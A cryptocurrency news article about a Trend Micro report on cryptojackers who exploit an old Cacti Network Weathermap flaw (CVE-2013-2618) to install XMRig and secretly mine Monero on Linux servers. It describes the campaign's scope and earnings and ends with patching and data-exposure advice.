‘Cryptojackers’ Exploit Age-long Vulnerability Flaw in Linux Servers to Mine Monero $XMR

Cryptocurrency mining has become quite a lucrative venture for miners in recent times. While many miners carry out their operations in a legit way, investing in the necessary pieces of equipment required to mine successfully, some bad actors in the crypto space prefer to crypto jack other peoples systems to mine Cryptocurrencies.

Hackers are now using a nearly five-year-old vulnerability to infect Linux servers and mine the privacy-centric Monero altcoin.

According to the US-based internet security company, Trend Micro, hackers are exploiting the loophole present in the Network Weathermap plugin for Cacti.

The vulnerability the hackers are taking advantage of is categorized as CVE-2013-2618. The loophole is allowing the cyber criminals to be able to execute code on underlying servers.

Once they execute these codes, they can now go ahead and install legit Monero mining software known as XMRig.

The expert researchers have said that the Weathermap vulnerability issue enables the hackers to have enough time to carry out their illicit operations. The attackers check up on the installed malware every three minutes to ascertain whether anyone might have shut down the computer.

Unlike other crypto jackers who use up huge amounts of CPU resources to carry out their selfish goals, these new breeds are much more clever.

To avoid being detected easily, they program the XMRig to perform with the highest level of discretion. This way, the miners use a minimal amount of system power, making it almost impossible to suspect their mining activities.

It might interest you to know that the patch for the loophole has reportedly been developed and made available online since five years ago, but some users are still ignorant of this fact and may still be mining Monero for hackers without knowing it.

“It’s also a classic case of reused vulnerabilities, as it exploits a rather outdated security flaw whose patch has been available for nearly five years,” some parts of the report read.

So far, the malware has targeted mostly public Linux x86-64 servers globally. There have been reported cases of the attack in countries such as Japan, India, Taiwan, China and the U.S.

The Trend Micro researchers have tracked the two Monero wallets that have been receiving the mined coins ever since. The experts have estimated the total amount of Monero gotten from the operation at 320 XMR ($63,000).

Per the researchers, users of the Cacti Network Weathermap need to try their best to install the most up-to-date security software and ensure their data is kept away from public servers.

“Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments, it also does the same for threat actors,” the report concluded.

Be the first to comment

Leave a Reply

Your email address will not be published.


*